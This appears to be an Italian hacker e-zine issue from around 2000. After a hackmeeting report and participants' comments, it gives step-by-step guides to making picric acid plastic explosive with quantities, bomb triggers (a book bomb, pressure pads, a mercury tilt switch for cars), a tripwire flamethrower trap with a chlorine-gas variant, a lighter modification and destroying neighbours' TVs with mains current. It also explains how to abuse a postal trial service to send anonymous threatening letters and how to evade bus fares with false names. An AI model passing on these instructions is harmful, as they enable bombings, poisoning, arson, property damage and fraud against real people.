donna, il caso ha voluto che in quei 4 giorni la musica techno era su per 24
ore al giorno effettive e lui aveva inziato a dare strani segni, del tipo:

immaginatevi un orologio che segna le 12:15, bene, io dormivo nella direzione
delle 15 e lui delle 12, non so come ma una notte me lo sono ritrovato sopra
che si agitava come un maialino siciliano........

Come se non bastasse, una mattina si alza e dice: "ma io AMO la musica techno,
fino a ieri mi faceva schifo, io ora la AMO con tutto me stesso, voglio i cd
techno....

Hei, ma Pinna fa musica techno, io AMO Pinna, perchè non m'ha dato il ciddì...
....oh noooooo ora Pinna è andato via nooooooooooooo"
.....era diventato
tristissimo, al ritorno dall'hackit aveva addirittura cercato di barattare il
numero di telefono di Pinna con due schede di rete.....Vi rendete conto?
Due schede di rete 10/100 per un numero di telefono, e poi diceva cose del
tipo: "Io vorrei vivere con Pinna, è il mio idolo".......Ecccccc.......

Morale: non andate mai a nessun hack meeting con un amico che abbia una
personalità poco forte :PPPP altrimenti rischierete di dovero tornare con una
specie di alieno e soprattutto NON ASCOLTATE MAI LA MUSICA TECHNO, i danni
che provoca sono evidenti credo :)

Ciauzzzzzzzzzzzzzzzz

---Quequero---

--------------------------------------------------------------[ HacK-it00 ]---
===] I COMMENTI [=============================================================
-----[ OldirOn61 ]------------------------------------------------------------


Alla richiesta di rilasciare un piccolo commento sull'hack-it da inserire su
AiS3 gli intervistati hanno risposto cosi':

=] ANONIMO [=

<****> uhmmmmm......brevissimo?

<Old1> si, possibilmente

<****> beh.. 1° una figata..
<****> un botto di gente... e di fighe...
<****> un posto stupendo... pareva un covo di pirati medioevale..
<****> non organizzato benissimo, rete che andava e veniva, sniffer
piantati nei gateway; e sinceramente sta cosa non mi è piaciuta
molto :/
<****> sono entrate le telecamere del tg1
<****> e non mi è piaciuto sentirmi dire: t'ho visto al tg1 stamattina
<****> poi....
<****> i momenti che mi son + piaciuti di sicuro son stati..
<****> Nobody88 che s'è addormentato con il dito medio alzato
<****> poi......TheDuke e Mayhem...che trasmettevano insieme in radio..
<****> e poi, dal punto di vista teknico..
<****> quando ci siamo hijackati una persona che all'hack-it faceva
troppo lo sgargiante...e quando s'è visto apparire sulla sua shell:
"provo a rootartela io?" ha incominciato a gastemare in aramaico
<****> Preferisco non fare nomi...ma era giusto per fargli capire...di
abbassare un pò la cresta, che di certo non è il + bravo sulla terra :)
<****> per la cronaca
<****> a te lo dico..
<****> era Roul Chiesa
<****> fankulo a lui e l'hacking senza etica che FA
<****> in kulo a lui e tutti quelli come lui...se la meritava :P

=] LOPKS [=

<lopks> ben organizzato , ma alcuni seminari , tipo quello
<lopks> delTCP/IP e quello sulla sicurezza di base
<lopks> erano troppo semplici e poco tecnici

=] VECNA [=

<vecna> l'hackit00 e' stato veramente bello a me e` piaciuto un sacco, i
seminari erano belli, il posto favoloso, peccato x i cavi rovinati e
per i pirla che facevano arp hijacking
<vecna> anzi, l'arp hijacking in se e` una cosa di tutto rispetto, il problema
si pone quando qualcuno si e` messo a hijackare il gateaway
<vecna> il se era ben organizzato, peccato x i seminari che sono saltati, la
birra costava di meno dell'anno scorso xo`, come ogni hackit vieni vai
con 1000 progetti ma poi ti diverti cosi` tanto che non si fa` mai
niente se non cose particolarmente organizzate
<vecna> una delle cose + belle dell'hackit e' vedere il decadimento fisico
delle gambe del NaiL^d0d, il primo giorno camminava, il terzo lo
portavamo a braccietto, di quanto e' stato seduto non camminava + :PP

=] MAYHEM [=

<mAyhEm> senza dubbio il risultato di un certo impegno da parte degli
organizzatori,alta la partecipazione, sia come numero che
emotivamente
<mAyhEm> diversi corsi ben curati, unica pecca qlc problema con la rete
<mAyhEm> per il resto una bella esperienza... troppo breve :(
<mAyhEm> beh direi che come sempre
<mAyhEm> indipendentemente dagli scopi sulla carta, si e' rivelata una grande
occasione per passare del tempo assieme e cosolidare conoscenze/
amicizie; cio' che mi ha molto colpito è l'assoluta civilta' nella
quale si e' svolto il tutto
<mAyhEm> di solito, quando si riunisce una tale quantita' di gente
<mAyhEm> nascono sempre alcuni casini... piccole risse, furtarelli, litigi
<mAyhEm> la scomparsa di un disco e di un banco di ram a parte

<Old1> e di un cilotto (il mio!) :(

<mAyhEm> direi che la capacita' di vivere assieme di tutti
<mAyhEm> mi ha decisamente impressionato, non mi aspettavo che andasse cosi'
bene :)
<mAyhEm> mi spiace per il tuo cilotto :(

<Old1> e vabbe'

<mAyhEm> direi che basta cosi', cita anche il mio dispiacere per il cilotto;P)
<mAyhEm> :)

=] PR0DIGY [=

<Pr0digY> strafigo per l'ambientazione cyberpunk e per una parte della gente
che c'era
<Pr0digY> una merda dal punto di vista della rete e dei corsi

=] LO SMILZO [=

<Old1> me lo dai un brevissimo commento sull'hack-it?

<Smilzo> mhh
<Smilzo> kewl

<Old1> forse un po' TROPPO BREVE....

<Smilzo> mi e' piacuto l'ambientazione
<Smilzo> iperrumoroso

=] SMAV [=

<smav> l`acccchit e` stato un bel modo x conoscere e farmi conoscere... e x
imbrattare ankora d + la gente... e x conoscere OldirOn61 che mi sta
simpatico ma mi piaglia x scema ehehehhe =*

---OldirOn61---

###########################################################################
####### GGGG OOO OOO DDD SSSS TTTTTT U U FFFFFF FFFFFF #######
####### G O O O O D D S TT U U F F #######
####### G GG O O O O D D SSSS TT U U FFF FFF #######
####### G G O O O O D D S S TT U U F F #######
####### GGGG OOO OOO DDD SSSS TT UUUU F F #######
###########################################################################

---------------------------------------------------------------[ dEstR0y! ]---
===] LIGHTERS OVERCLOCKING ]==================================================
-----[ ]CyB0rG[ ]-------------------------------------------------------------

SpEcIaL tnX: )Senara( - +MassicciO+
FuCk OfF: Docto - RLP - J.F.

Della serie 'non ho meglio da fare' ;)) eccomi qua con uno dei miei soliti
inutili (?) articoli, questa volta vi spieghero' una cosa che presumo sappiano
tutti (non l'ho mica inventata io) ma, puo' comunque tornare utile: come
overclockare l'accendino a gas. Vi vedo gia' stupiti no, no! non passate al
prox. articolo spe'...


Premetto che cio' non si puo' fare con tutti i tipi di accendini in commercio
bensi' con quelli che vendono + o - i vu cumpra': ovvero gli accendini
trasparenti colorati con la levetta per poter regolare la fiamma.

Materiale occorrente:

1 Accendino a gas (sopra descritto)
1 Cacciavite (opzionale ma utile se non volete distruggervi le mani)

!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
! ! !
! 1. .----., ! 2. ,, !
! | # |) ! _i(||) .-.--. !
! =|-----'HHh ! =|-----'HHh ( O )[]) !
! |#######| ! |#######| |.-.| | !
! |'!'|...| ! |'!'|...| || || | <-Parte metallica !
! | ! | | ! | ! | | ||_||__| !
! | ! | | ! | ! | | !
! | ! | | ! | ! | | !
! | ! | | ! | ! | | <-Accendino senza la !
! | ! | | ! | ! | | parte metallica !
! | | ::| ! | | ::| !
! ''''''' ! ''''''' !
! ! !
!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
! _ ! !
! 3. ( ) <- Particolare ! 4. .~. !
! | della levetta ! { o } <- Particolare !
! di controllo ! '~' (ingrandito rispetto !
! della valvola ! la fig. n°3) della !
! (vista dall'alto) ! valvola del gas !
! ! !
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!




Procedimento:

1- Toglite dall'accendino la parte metallica (senza romperla: poi vi servira'!
bastera' fare leva col cacciavite all'interno del condotto perche' questa
si allarghi leggermente e vi restera' in mano) [Fig. 2.]
2- Alzate leggermente la levetta di controllo della valvola per la fuoriuscita
del gas [Fig. 3] (solitamente nera) e (senza far ruotare la valvola
[Fig. 4.]
(solitamente bianca)) riportatela alla posizione di regolamento piu' bassa
(indicata con '-' o 'MIN')
3- Riabbassate la levetta di controllo
4- Adesso alzate (come fareste normalmente) la fiamma portando la levetta alla
posizione max.
5- Rialzate la levetta e riportatela alla mosizione min. senza muovere la
valvola
6- Ripetete gli ultimi passi sino a quando non vi sareste stancati ;)))
7- Rimettete la parte metallica all'accendino e stringetela ad esso con le
mani
(meglio con una pinza)
8- Adesso, stando attenti alle vostre belle manine :-), accendete la fiamma
(che
sara' alta abbastanza)

Generalmente per spegnerlo adesso non dovrete fare altro che soffiare forte
sul
punto di fuoriuscita del gas poiche' il sistema di controllo della fuoriuscita
del gas e' andato a farsi benedire. Non tenete la fiamma accesa piu' di 1
minuto o vi ritroverete le mani bruciate e, dopo circa 1 minuto la plastica
dell'accendino inizia a fondere... rischiate che vi scoppi in mano o di
ritrovarvi i vestiti incendiati.

Sembra difficile ma non ci vuole un cazzo e, se lo fate una volta vedrete che
poi
non e' nemmeno tanto pericoloso... ovviamente per usi ed abusi vi rimando al
disclaimer.

bye
---]CyB0rG[---


---------------------------------------------------------------[ dEstR0y! ]---
===] IL PLASTICO FATTO IN CASA ]==============================================
-----[ The Raven ]------------------------------------------------------------

Questo esplosivo deriva dal Fenolo. E' tossico e forma acido pirico
se inalato, ingerito, maneggiato o assorbito attraverso la pelle.
La tossicita' restringe l'uso di questa miscela perche' se si e'
intossicati si puo' morire se non ci sono cure immediate. Ma noi ce ne
sbattiamo allegramente le palle, usiamo i guanti e alcune altre
precauzioni che vi diro'...

Questo esplosivo e' cugino del T.N.T. ma e' PIU' POTENTE. Fu il primo
esplosivo militare nel 1888. Oggi lo si puo' fabbricare in meno di
tre ore.

OCCORRENTE:
- "acetylsalicylic acid", in breve un acido che si ottiene dall'
aspirina (poi vi spiego come)
- Acido solforico puro al 98%, gravita' specifica 1.8
- nitrato di sodio o di potassio

Viene chiamato Trinitrofenolo, ma noi lo chiameremo "plastico all'
aspirina"
, o TNF. Va conservato in contenitori di vetro a tenuta
stagna, e ASSOLUTAMENTE VA TENUTO LONTANO DA QUALSIASI METALLO
ad eccezione dell'alluminio, in quanto genera sali tossici super
sensibili (ed esplosivi pure loro) che faranno detonare il TNF.

Allora: l'aspirina. Le marche economiche vanno benissimo, anzi sono
consigliate. Polverizza qualche pasticca. Per ottenere l'acido di cui
sopra, bisogna sciogliere la polvere in alcool "methyl", o METILICO
(mmm devo controllare la traduzione) e mischiare vigorosamente. Non
tutta la polvere si sciogliera'. Filtra questa dall'alcool. Lavala con
altro alcool ma meno di quello di prima. Ripeti la procedura. Ora
mischia l'alcool e fallo evaporare in un piatto. Rimarranno dei
cristalli.

Prendine 40 gr e scioglili in 150 ml di acido solforico, e riscalda
per sciogliere tutti i cristalli.

Questa parte dovrebbe essere fatta all'aperto, o con un buon sistema di
ventilazione. Aggiungi lentamente 58 gr di nitrato di sodio o 77 gr di
nitrato di potassio (salnitro anymore?) all'acido, e mischia bene. Si
formera' un fumo rosso (triossido di nitrato - "nitrogen trioxide"),
evitate qualsiasi contatto. Fermatevi se l'acido sta per uscire dal
contenitore. Quando avete finito, lasciatela raffreddare, almeno
fino a 30=B0C. La soluzione va versata lentamente nel doppio del suo
volume in acqua e ghiaccio. Si formeranno cristalli gialli in acqua.
Questi devono essere filtrati e messi in 200 ml di acqua distillata
bollente. Lasciate raffreddare e rifiltrate i cristalli. Ora avete
TNF purissimo. Vanno conservati in un piatto pirex in olio ad una
temperatura di 80=B0C per due ore. La temperatura va mantenuta costante
e controllata con un termometro. Ora polverizzali e aggiungi il 10%
(in peso) di cera e il 5% di vaselina in fusione, e impasta bene con
le mani (PROTETTE DA GUANTI).

L'esplosivo resta plastico da 0 a 40=B0C,
ha una velocita' di detonazione intorno ai 7000 m/s, quindi ad alto
impatto. E' tossico da maneggiare ma si fa facilmente con ingredienti
comuni ed e' adatto nella demolizione. E' molto adatto per cariche
di forme particolari. Non e' potente come il C4 o altri esplosivi
basati sull'RDX ma piu' potente del TNT, e molto + facile da fare in
casa. Ancora una volta, e' tossico: non maneggiare a mani nude ne'
inalare. EVITARE IL CONTATTO CON QUALSIASI METALLO TRANNE L'ALLUMINIO.

the_raven@libero.it
www.raven.3000.it

Fonte: The Punisher
Traduzione:

---The Raven---

---------------------------------------------------------------[ dEstR0y! ]---
===] FLAMETHROWER TRAP. ]=====================================================
-----[ X_Ted ]--[Broken Shell Crew]-------------------------------------------

QUESTO TESTO E' A TITOLO PURAMENTE INFORMATIVO: QUALSIASI UTILIZZO ILLEGALE DI
QUESTE INFORMAZIONE NON E' DA IMPUTARSI A ME.
SE VI FATE MALE O NE FATE AD ALTRI NON E' COLPA MIA.

Il lanciafiamme e' gia' stato illustrato da ]CyB0rG[ nel numero 2 di Ais,
questa che segue ne e' una semplice ma efficace applicazione.

Occorrente:
- bomboletta spray ( deodorante o altro)
- accendino che rimanga acceso anche senza dover tenere il pulsante
schiacciato (zippo)
- elastico resistente e piuttosto grosso (dipende dal tipo di bomboletta
- stecca di legno (quella dei ghiaccioli e' ok)
- filo di nyoln
- scotch + un qualcosa che faccia da separatore, di materiale non
infiammabile.

1. Prendete la bomboletta spray e con l'elastico fate in modo che il tappino
sia sempre schiacciato e spruzzi continuamente.
2. Infilate la stecca di legno tra il tappino e la bomoletta in modo da
impedirgli di spruzzare
3. Prendete l'accendino attaccatelo assieme al separatore in modo che la sua
fiamma sia sulla traettoria di uscita del gas della bomboletta, ma
abbastanza distante dal tappino da non rischiare di fonderlo.
4. Legate una estremita' del filo alla stecca di legno e l'altra estremita'
ad una porta o in un altro posto in cui possa essere facilmente tirato
dalla vittima.
5. Accendete l' accendino e scappate.

Quando qualcuno tirera' involontariamente il filo la stecca di legno si
togliera' e l'elastico potra' schacciare il tappino. Questo iniziera' a
spruzzare gas che verra' infiammato dall' accendino piazzato sulla sua
traettoria. Ricordatevi di piazzare la bomboletta in modo che sia stabile e
che non si ribalti appena la stecca di legno viene strattonata!

Disegni opzionali (anche perche' poco comprensibili).

BOMOBLETTA NORMALE
__
| | <--tappo
|__O <-- buco da cui esce il gas
__||__ <-- il collegamento tra la bomoletta e il tappino deve essere
| BO | scoperto
| MB |
| OL |
| ET | <-- bomboletta
| TA |
|______|


1. __ :::::::::::
|# O..;::::::::::: <--- spruzzo
_|#_| :::::::::::
| # |
| # |
| # <--------elastico
| # | <-- bomboletta
| # |
|__#___|


2.
__
|# O
|#_|
========#|__
legno -^ |^^# |
| # |
| # |
| # | <-- bomboletta
| # |
|__#___|

3.

__ !
|# O !! <-- fiamma
|#_| !!!
========#|__ _||%_o------|
|^^# | | |______|
| # |[]|zippo|
| # |[]|_____|
| # | ^-------- isolante
| # |
|__#___|




4 e 5.
__ !
|# O !! <-- fiamma
|#_| !!!
-----=======#|__ _||%_o------|
^- filo |^^# | | |______|
| # |[]|zippo|
| # |[]|_____|
| # |
| # |
|__#___|

IN FUNZIONE. !!! !
::!!!!!!!!!!!!!
__ ::!!!!!!!!!!!!!!!! <-- fiamme
|# O .::!!!!!!!!!!!!!
-======== _|#_|_ _||%_o------|
^- legno | # | | |______|
staccato | # |[]|zippo|
| # |[]|_____|
| # |
| # |
|__#___|



Variabili divertenti ( se cosi' si puo' dire).

Cloro. (OCCHIO CHE E' UN GAS PERICOLOSISSIMO)
Create del cloro mischiando Ammoniaca e Varechina in una bottiglia, poi
mettete un palloncino sul collo della bottiglia raccoliendo il coloro
(procedimento descritto in MY PERSONAL COOKBOOK! di Avatar666).

Mettete poi il palloncino sulla traettoria del gas, ma distante dall'accendino
altrimenti scoppiera' prima del previsto.
Sempre con il palloncino del cloro potete fare una modifica alla trappola.
Castruite tutto come scritto sopra ma saltate il punto 3: incastrate invece
uno spillo nell'apertura del tappino. Quando la stecca verra' tolta l'ago
partira' e se avete ben posizionato il palloncino, mandera' in giro il Cloro.
Queste due varianti non le ho ancora sperimente.

---X_Ted [Broken Shell Crew]---


---------------------------------------------------------------[ dEstR0y! ]---
===] INNESCHI PER ESPLOSIVI ]=================================================
-----[ The Raven ]------------------------------------------------------------


La maggior parte di queste idee sono prese dal libro

L'artificiere (the tick tock man)
di Terence Strong

L'ho divorato! Leggetelo, anche se tutte le idee utili le ho
trascritte qui (ma un paio sono mie). Non ho solo copiato, quel
bastardo ha tagliato quasi tutte le info davvero utili... Di base c'ha
messo le idee, io le realizzo.

Il circuito di cui si parla di seguito e' semplicissimo:


OOOOOOOOO------------pila o alimentatore--------interruttore
O bomba O (o innesco: quelli
OOOOOOOOO qua sotto in pratica)
I I
\--------------------------------------------------/

Ecco gli inneschi:
* cellula fotoelettrica
E' un componente elettrico che normalmente blocca la corrente, ma la
fa passare in presenza di luce. Mettete questo tra alimentatore ed
esplosivo e quando la zona sara' illuminata... BOOM!

* materassino
Avete presente quei cuscinetti gonfiabili che quando li premete fanno
"squeak"? Bene, togliete il fischietto, mettete al suo posto una
cannuccia. La cannuccia dovra' terminare all'interno di un contenitore
e soffiera' aria su due lamelle metalliche (alluminio ad esempio) in
modo che quando soffia, le due si toccano e chiudono il circuito.
Segue schema ASCII

I
V

/------\ /--------\
I I I _ ___I circuito
I =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D | i I
\------/ I I
materassino \--------/
con cannuccia contenitore

Lo so fa schifo ma usate un po' di fantasia. Bene, quando qualcuno
cammina sopra il vs materassino, la cannuccia soffia sulla lamella di
alluminio che tocca l'altro polo, il circuito si chiude... BUM!
Piazzate il materassino sotto una mattonella, sotto la sabbia...

* cartoncino nel libro
Classico pacco-bomba: scavate all'interno del libro in modo da metterci
abbastanza esplosivo + l'alimentatore, e fate in modo che l'
interruttore siano due lamelle separate da un cartoncino che esce dal
libro: quando uno lo sfila... inutile dirlo!

* Bulbo al mercurio
Questo e' bellissimo: si tratta di un piccolo contenitore pieno per
meta' di mercurio, che come sappiamo conduce elettricita', essendo un
metallo. Nell'altra meta', poco sopra il mercurio, ci saranno i due
poli del solito circuito, che pero' NON TOCCANO il mercurio.
ecco lo schema:

V-------------
V __________
___V___V__
/ V V \
/ \
I~~~~~~~~~~~~I ~ =3D mercurio
I~~~~~~~~~~~~I
\____________/

Cosa succede? Quando il tutto si agita, il mercurio entra in contatto
coi due poli chiudendo il circuito... E basta un piccolo urto!
Figuriamoci se lo montiamo su un'automobile...

* assicella nella molletta
Questa e' davvero banale:

_____________ sarebbe una molletta...
\_____o____X/
-----o =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3Dassicella
/__________X\

Inutile dire che le due X sono i due poli e che si toccherebbero senza
l'assicella... Tutto sta a legare tale assicella ad un filo, che poi va
teso in terra o messo a mo' di interruttore (sapete, nelle cantine).
Ottimo per le mine.

* Interruttore
Questa e' proprio stupida (non nel senso di inefficace, pero'):
smontate la piastra dove c'e' l'interruttore della luce e prendete i
due fili. Attenzione che ci passa corrente! Tagliateli, e al posto
dell'interruttore fateli andare a finire all'esplosivo... Che potrete
nascondere anche lontano. In un bagno pubblico non dev'essere male.

Okay, credo di avervi dato abbastanza idee. Gia' che ci sono, vi do'
anche un altro paio di dritte dal libro, che pero' non riguardano
gli interruttori. Le metto qui perche':
1) Sono info non complete
2) Sono troppo poche per un nuovo file.

Ecco qui:
L'idrossido di sodio (SOH- -?-) prende fuoco a contatto con l'acqua
Indovinate cosa si puo' fare... Fumogeno + impianto antiincendio
a pioggia... Io non vi ho detto niente...

ricetta: ANS. nitrato d'ammonio (fertilizzante) e zucchero a velo.
Purtroppo non dice le quantita'. Lo zucchero ha il solo compito di
frenare la combustione. Dovrebbe innescarsi con l'elettricita' e col
calore, ma non ne sono sicuro.

the_raven@libero.it
www.raven.3000.it

---The Raven---

---------------------------------------------------------------[ dEstR0y! ]---
===] TV IN TILT?? ]===========================================================
-----[ ]CyB0rG[ ]------------------------------------------------------------

Hihihihihihi! Non prendetevela con me per la mole di righe
pazze che pubblico su questa zine: e' solo colpa della mia
mente malata. Questa volta vi spieghero' qualcosa che a mio
parere puo' essere realmente utile (beh! per me anche le
altre cose che ho trattato non erano del tutto inutili =):
come fare bruciare tutti i televisori del vostro condominio!!
Come al solito vi vedo gia' con le vostre bocche spalancate,
vedo anche qualcuno che sta passando al prox. articolo =(
...tutto sommato puo' essere qualcosa di divertente.
(non so se altre zine lo hanno gia' pubblicato... a me lo ha
insegnato il mio tecnico televisivo (grande Marco G.!))

>Materiale Occorrente<

1 Presa maschio per antenna televisiva
1 Filo elettrico con una presa 220

Tutto qui? Sì, almeno: mi pare ovvio che dovrete avere un presa
al muro per l'antenna televisiva e una presa elettrica.

>Danger!<

Ricordate di scollegare dall'antenna condominiale tutti i
televisori del vostro appartamento, altrimenti andranno bruciati
anch'essi. Dopo che farete tutto è molto probabile che la
corrente elettrica si stacchi automaticamente nel vostro
appartamento... questo potrebbe fare insospettire gli altri
condomini nel vedervi scendere a riattaccarla (forse se avete un
salvavita evitate 'sta fatica).



...''''''-.
(o) ) )§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§.
''',,,,,,-' '§§
§§
§
..--------. §
()((((| : §§
| | .: .§§
| | :§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§'
| | ':
()((((| :
''--------'

>Procedimento<

Prendete un filo elettrico e collegategli da una parte la presa
maschio dell'antenna e dall'altra la presa elettrica. Staccate
i vostri televisori dall'antenna centrale e collegate il cavetto
da voi costruito rispettivamente a una presa elettrica e alla presa
a muro dell'antenna condominiale. Zap! I tubi catodici dei vostri
'amati' condomini saranno andati in fuori uso ;DDD. Vi consiglio di fare
tutto nelle ore in cui la gente e' sicuramente a casa poiche',
purtroppo, oramai chiunque sta in casa ha sicuramente il tv acceso
(Grande Fratello!) meglio ancora se lo fate quando c'e' Sanremo (bleah!),
un bel film 'imperdibile' o qualche altra trasmissione demente che
la gente non vuole perdere.

>Funzionamento<

In pratica non avete fatto altro che sovraccaricare
la centralina TV che sta (generalmente) nel sottotetto del vostro
palazzo.

bye
---]CyB0rG[---


---------------------------------------------------------------[ sKamMinG ]---
===] SPEDIRE POSTA CARTACEA DALLA NET A LIRE 0 ]==============================
-----[ mR_bIs0n ]-------------------------------------------------------------


Della serie.... Enjoy skammin'

Roba de pazz!

Consumo: nulla
Musica ascoltata: Nirvana, Guano Apes, Guns 'n' Roses a palla
Saluti a: Biby, Guilecool, Carmine.
Fankulo a: Ceino Pompino

!!!Disclaimer!!!
Io, mR_bIs0n, sono la causa del vostro arresto o altri guai successi per aver
letto questo art... allora il mio vero nome Š Alessandro Ceino. Denunciatemi
e insultatemi... (kiss… perkŠ il mio vero nome kambia ad ogni art...)

Beeeeeeeene raga'! Sono il solito rompi coglions di mR_bIs0n! Oggi vi ho
scritto un art su kome mandare posta cartacea via internet e senza pagare,
ovviamente...

Oki iniziamo... dobbiamo sapere innanzitutto ke ora le Poste Italiane hanno
implementato un servizio di posta via internet, kiamato InterPosta... bene
questo servizio serve a skrivere una lettera su internet, ke poi arriver… al
destinatario su carta... heheheh... voi direte... MA SI PAGA??? Certo ke si
paga... ma possiamo farci un abbonamento di prova e mandare UNA SOLA
lettera... uffa... ma nessuno ci dice di non farci 3000 abbonamenti vero???
EHEHHE!!!

Oki vi collegate al sito www.interposta.com, andate nella sezione "Prova
Interposta"
, proseguite e immettete dati fasulli, ma attenzione! Nella
sezione della e-mail immettete una e-mail valida, magari creata poko prima
con, ke so', Yahoo! Mail... perkŠ in quella kasella arriver… un kodice da
usare... bene, fatto ci• possiamo mandare una lettera... HIHIHHIHI il bello
sta ke possiamo benissimo settare il mittente della lettera!! HEEHHE sapete
quanti professori hanno mandato lettere minatorie al preside della mia
skuola???.... Stupendo...
Dopo massimo 3 giorni arriver… al destinatario della lettera la busta e la
lettera appunto kos:

__________________
|\ @ /| UN SERVIZIO DI POSTE ITALIANE S.P.A.
| \__________/ | ACCESSIBILE VIA INTERNET ALL'INDIRIZZO
| INTERPOSTA |
|________________| WWW.POSTE.IT

REALIZZATO DA THURMA S.R.L.
VIA DEI PIATTI 4 - 20123 MILANO



IS35654
Preside De Rinkoglionitis
Liceo Scientifico
GALILEO GALILEI
Via degli scorreggi tonanti, 12
00100 MILANO

|| || | ||||| | || || ||| |

Prof. De Imbecillis
Via delle Magliolie, 66
00100 MILANO
Italy



Alli murtacci tui, kekka maledetta, ke ti spakkino la figa usando una katana!
(pankry rulezz)
....
Bene, ora ke vi siete divertiti volete farne altre... ma c'Š un problemino,
anzi pi—:

dovete usare un altro abbonamento, di konseguenza, un'altra e-mail...
dovete kancellare tutti i kookies ke vi mette dal sito, perkŠ i bastardi ci
vogliono fottere...

Pu• sembrare un lavoraccio, ma in fondo Š divertente!!!

Spero ke quest'art vi sia stato utile!!!
CIAO!

(In realt… ho finito subito i saluti perkŠ mi skappa di pisciare...)

---mR_bIs0n---

---------------------------------------------------------------[ sKamMinG ]---
===] IL BUS SKAMMING ]========================================================
-----[ The Raven ]------------------------------------------------------------

Bene, e' la prima volta che scrivo per AIS, anzi e' la prima volta che
scrivo per una zine (ho scritto pero' un cookbook, reperibile su
www.raven.3000.it -pubblicita' occulta?), sempre che il buon OldIron
decida di pubblicarmi... Dovrei avervi gia' rotto le palle a
sufficienza, quindi cominciamo.


Ah, il Bus, il Pullman, la Corriera... Un utile ed ecologico mezzo di
trasporto, comodo, veloce e quasi mai in ritardo. Ha un solo difetto:
il biglietto! Lo Skamming, come tutti dovreste sapere, e' l'arte di
ottenere oggetti o servizi in modo gratuito, legalmente o meno. Ebbene,
a meno che non vi regalino un abbonamento modi per scroccare il viaggio
in bus non ce ne sono (in modo legale intendo). Per prima cosa,
comprate (che brutta parola...) un biglietto, e fate una (meglio tre)
corse, per vedere i controlli che ci sono. Se c'e' il tipo che li fa
in corsa, o che li controlla in corsa, non c'e' scampo, e vi tocca
pagare. Ma in genere questo tipo di cose viene fatto nei treni oppure
nei bus estivi che portano al mare, per quelli urbani ed extraurbani
(almeno per la situazione che conosco io, cioe' l'ACAP di Pxxxxxxx e
la SITA della zona di Bxxxxxxxxxx) c'e' la makkinetta obliteratrice
nel bus e i biglietti non li controllano MAI. Io all'inizio compravo
regolarmente il tagliando, ma vedevo gente che non lo faceva. Pensai
che avessero un abbonamento, ma non era sempre vero. Allora ho
cominciato a tenere in tasca un biglietto obliterato (per mesi sempre
lo stesso), oppure timbravo 4 o 5 volte lo stesso. E non c'e' mai stato
un controllo. Fino a stamattina. Sono tre mesi ormai che non ho neanche
piu' il biglietto usato, e alla fermata chi ti trovo? Due controllori
ACAP. Questa e' la situa piu' difficile, me la sono vista brutta.
Innanzi tutto, SANGUE FREDDO: Calma, state tranquilli. I tipi vi
aspettano in strada, alla discesa, uno da una parte e uno dall'altra
della portiera di discesa. Allora, gia' qui due trucchi:

** SE LI VEDETE PRIMA DI SCENDERE
1) Uscite da una delle entrate e vi allontanate IN FRETTA MA SENZA
CORRERE,
2) saltate la fermata e scendete alla successiva, tanto non salgono.

** SE NON VE NE ACCORGETE E VE LI TROVATE DAVANTI MA SIETE IN MOLTI
A SCENDERE.
Se avete la sfiga vi bloccano tra loro due, il bus e un muro. Quindi
cercate di scendere almeno i 7, se siete soli vedete dopo. Mentre
controllano i primi due o tre, voi cacciate il portafoglio e TOGLIETE
ogni documento di identita', mettetevelo in tasca o che so io. Poi
aspettate il momento in cui il controllore + lontano stia esaminando un
biglietto e accodatevi al tipo gia' controllato davanti a voi che se
ne sta andando, cosi' ho fatto io stamane. Certo che se avete un
biglietto, anche vecchio (intendo col timbro vecchio ma non deve
essere rovinato) e vi agitate facilmente, mostrateglielo di sfuggita e
andatevene.

** SE SIETE IN POCHI (2 o 3) OPPURE SOLI E SIETE GIA' SCESI
A questo punto avete diverse possibilita'.
1) La piu' facile: fate finta di non TROVARE il biglietto, e dopo date
un nome falso (se proprio hanno voglia di rompere il cazzo). In
teoria triplicano la multa (da 60mila a ben 180mila) se se ne
accorgono, quindi voi dite di NON AVERE DOCUMENTI e andate tranqui.
NON POSSONO frugarvi nel portafoglio, non hanno questo potere.
2) Fate finta di non trovare il biglietto (aprite il portafoglio,
occhiata velocissima e via, oppure mostrate loro il vecchio) ma di
andare ESTREMAMENTE di fretta, fategli capire che NON AVETE TEMPO DA
perdere con queste stronzate e che avete un affare importante da
concludere, li citerete x danni se fate tardi. Serve una buona dose
di faccia tosta pero'.
3) Se siete veloci, SCAPPATE, MA VELOCE! Se vi bekkano poi date un nome
falso, ma non sperate di farla franca facilmente.
4) Semplicemente dite di non averlo e andate via. Funziona solo se:
a) Avete MOLTISSIMA faccia tosta
b) Siete MOLTO PIU' GROSSI E AGGRESSIVI dei controllori
c) Non c'e' gente in giro
d) Girato l'angolo avete un posto dove nascondervi
e) Quelli non hanno voglia di perdere tempo per 1500 lire
Praticamente MAI!

Io continuo a viaggiare a sbafo quasi ogni giorno, tanto nella peggiore
delle ipotesi (in caso di controllo, finora uno su 400) pago 60/180mila
(sempre che mi ritrovassero col nome falso che gli darei, dovendone
dare uno: praticamente la farete franca in caso di controllo senza dar
nomi in 4 casi su 5) e gliene ho gia' sbafate oltre 600mila... Conosco
gente che e' "sopravvissuta" a 3 controlli (quelli che hanno fatto, non
uno "fallito") dando nome falso. E' talmente facile... Se volete
inventatelo, ma se c'e' una persona che vi sta sul kazzo usate il suo!
E' preferibile in tal caso conoscere anche il suo indirizzo.
Quindi, ricapitolando, ho 1 possibilita' su 1000 di pagare una multa
(sempre che mi trovino, of course) in ogni caso minore di quello che ho
risparmiato. Tutto questo usando il bus 5 volte a settimana,
soprattutto urbane ma prima facevo anche tratti extraurbani (stessa
situazione). Morale della favola, io gia' oggi pomeriggio ho viaggiato
di nuovo a sbafo... Uaz uaz uaz

PS Questo txt, come quelli sull'hacking, e' rivolto ai gestori ACAP
affinche' migliorino i controlli, e io non ho mai fatto davvero queste
cose... See come no... FOTTETELI SEMPRE E COMUNQUE! Enjoy the Skam!

the_raven@libero.it
www.raven.3000.it

---The Raven---

